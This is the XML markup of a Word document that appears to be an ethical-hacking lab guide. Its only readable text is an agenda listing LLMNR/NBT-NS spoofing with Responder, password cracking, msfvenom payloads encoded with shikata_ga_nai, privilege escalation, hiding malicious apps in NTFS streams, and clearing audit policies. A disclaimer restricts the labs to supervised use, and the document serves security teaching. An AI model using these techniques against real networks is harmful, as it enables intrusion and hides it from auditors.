                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38" y="754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19" y="732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38" y="732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38" y="41"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19" y="41"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7821" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7821" y="10"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7812" y="0"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="38" y="732"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19" y="732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38" y="754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38" y="732"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7780" y="732"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="38" y="732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38" y="754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7780" y="754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7780" y="732"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7780" y="22"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7780" y="754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7802" y="732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7821" y="732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7821" y="41"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7802" y="41"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7780" y="22"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7821" y="732"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7802" y="732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7780" y="754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7821" y="754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7821" y="732"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7720" y="91"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="100" y="91"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91" y="101"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91" y="672"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7720" y="682"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7730" y="672"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7730" y="660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="110" y="641"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="641"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="110" y="132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="113"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7730" y="113"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7730" y="101"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7720" y="91"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="132" y="641"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="110" y="641"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="641"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7689" y="641"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="132" y="641"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7689" y="660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7689" y="641"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7689" y="113"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7689" y="660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7711" y="641"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7730" y="641"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7730" y="132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7711" y="132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7689" y="113"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7730" y="641"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7711" y="641"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7689" y="660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7730" y="660"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7730" y="641"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="132" y="113"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="110" y="132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="113"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7689" y="113"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="132" y="113"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7689" y="132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7689" y="113"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7730" y="113"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7689" y="113"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7711" y="132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7730" y="132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7730" y="113"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="38" y="22"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19" y="41"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38" y="41"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38" y="22"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7780" y="22"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="38" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38" y="41"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7780" y="41"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7780" y="22"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7821" y="22"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7780" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7802" y="41"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7821" y="41"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7821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85D8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2029" y="397"/>
                            <a:ext cx="7692" cy="639"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="57912">
                            <a:solidFill>
                              <a:srgbClr val="4F80BC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6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05" y="579"/>
                            <a:ext cx="3508" cy="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7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6081" y="660"/>
                            <a:ext cx="128" cy="21"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:srgbClr val="1E497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8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89" y="577"/>
                            <a:ext cx="3145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19957F" id="Group 70" o:spid="_x0000_s1026" style="position:absolute;margin-left:98.2pt;margin-top:16.55pt;width:391.05pt;height:38.65pt;z-index:-15727104;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1964,331" coordsize="7821,7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">
                <v:shape id="AutoShape 75" o:spid="_x0000_s1027" style="position:absolute;left:1964;top:330;width:7821;height:773;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="7821,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" path="m7812,l9,,,10,,763r9,10l7812,773r9,-10l7821,754,38,754,19,732r19,l38,41r-19,l38,22r7783,l7821,10,7812,xm38,732r-19,l38,754r,-22xm7780,732l38,732r,22l7780,754r,-22xm7780,22r,732l7802,732r19,l7821,41r-19,l7780,22xm7821,732r-19,l7780,754r41,l7821,732xm7720,91l100,91r-9,10l91,672r9,10l7720,682r10,-10l7730,660r-7598,l110,641r22,l132,132r-22,l132,113r7598,l7730,101,7720,91xm132,641r-22,l132,660r,-19xm7689,641r-7557,l132,660r7557,l7689,641xm7689,113r,547l7711,641r19,l7730,132r-19,l7689,113xm7730,641r-19,l7689,660r41,l7730,641xm132,113r-22,19l132,132r,-19xm7689,113r-7557,l132,132r7557,l7689,113xm7730,113r-41,l7711,132r19,l7730,113xm38,22l19,41r19,l38,22xm7780,22l38,22r,19l7780,41r,-19xm7821,22r-41,l7802,41r19,l7821,22xe" fillcolor="#385d89" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="9,331;0,1094;7812,1104;7821,1085;19,1063;38,372;38,353;7821,341;38,1063;38,1085;7780,1063;38,1085;7780,1063;7780,1085;7821,1063;7802,372;7821,1063;7780,1085;7821,1063;100,422;91,1003;7720,1013;7730,991;110,972;132,463;132,444;7730,432;132,972;132,991;7689,972;132,991;7689,972;7689,991;7730,972;7711,463;7730,972;7689,991;7730,972;110,463;132,444;132,444;7689,463;7730,444;7711,463;7730,444;19,372;38,353;38,353;7780,372;7821,353;7802,372;7821,353" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:rect id="Rectangle 74" o:spid="_x0000_s1028" style="position:absolute;left:2029;top:397;width:7692;height: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" filled="f" strokecolor="#4f80bc" strokeweight="4.56pt"/>
                <v:shape id="Picture 73" o:spid="_x0000_s1029" type="#_x0000_t75" style="position:absolute;left:2505;top:579;width:3508;height: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">
                  <v:imagedata r:id="rId16" o:title=""/>
                </v:shape>
                <v:rect id="Rectangle 72" o:spid="_x0000_s1030" style="position:absolute;left:6081;top:660;width:128;height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" fillcolor="#1e497b" stroked="f"/>
                <v:shape id="Picture 71" o:spid="_x0000_s1031" type="#_x0000_t75" style="position:absolute;left:6289;top:577;width:3145;height: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">
                  <v:imagedata r:id="rId17" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00280B8F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="4" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3141532C" wp14:editId="32207ED3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1544612</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1033262</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3160558" cy="462057"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="3" name="image7.png" descr="CNA_largo-on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7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60558" cy="4620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80B8F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="5" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23AE3534" wp14:editId="6D3BC97B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5405120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>891149</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="539672" cy="607694"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="5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8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672" cy="6076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6B9B7B9" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCA18C3" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D24C1B0" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66275666" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2A829D" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:spacing w:before="56"/>
        <w:ind w:right="1436"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE188AB" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Carlito"/>
        </w:rPr>
        <w:sectPr w:rsidR="008B5358">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1420" w:right="0" w:bottom="280" w:left="600" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A44D479" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="9895"/>
        </w:tabs>
        <w:spacing w:before="82"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>do?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D980352" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>LLMNR/ NBT-NS Spoofing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC420B3" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3000"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2770E8" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3000"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23541E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285EC297" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3000"/>
        </w:tabs>
        <w:ind w:right="1648"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MSFVENOM to create a Payload and gain Remote Desktop (VNC)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access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565BDD77" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3000"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Create Payload using shikata_ga_nai and Escalate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-16"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4C0A6E" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hide Malicious Apps using NTFS Filestream (Win Ser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2016)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0938DC88" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Set and Clear Audit Policies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(Auditpol).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6570F438" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9895"/>
        </w:tabs>
        <w:spacing w:before="120"/>
        <w:ind w:left="840"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3955E5A1" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="00280B8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120"/>
        <w:ind w:left="840" w:right="1434"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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unsupervised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>environments/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>environments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Attempting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>certain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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real</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>environments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>proper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>written</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>consents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the owners of the network is punishable offense. All our labs are only for educational purposes and to be practiced under supervised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5730CC" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF7DDBF" w14:textId="77777777" w:rsidR="008B5358" w:rsidRDefault="008B5358">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4602C7D8" w14:textId="0ED240B7" w:rsidR="008B5358" w:rsidRDefault="006E4E04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3124"/>
        </w:tabs>
        <w:spacing w:before="92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3248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29AD595D" wp14:editId="2FE211D1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2461895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>12065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="567055" cy="250825"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="90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7055" cy="250825"/>
                          <a:chOff x="3877" y="19"/>
                          <a:chExt cx="893" cy="395"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="91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77" y="18"/>
                            <a:ext cx="413" cy="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2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57" y="18"/>
                            <a:ext cx="413" cy="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BAD3FC" id="Group 67" o:spid="_x0000_s1026" style="position:absolute;margin-left:193.85pt;margin-top:.95pt;width:44.65pt;height:19.75pt;z-index:15733248;mso-position-horizontal-relative:page" coordorigin="3877,19" coordsize="893,3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">
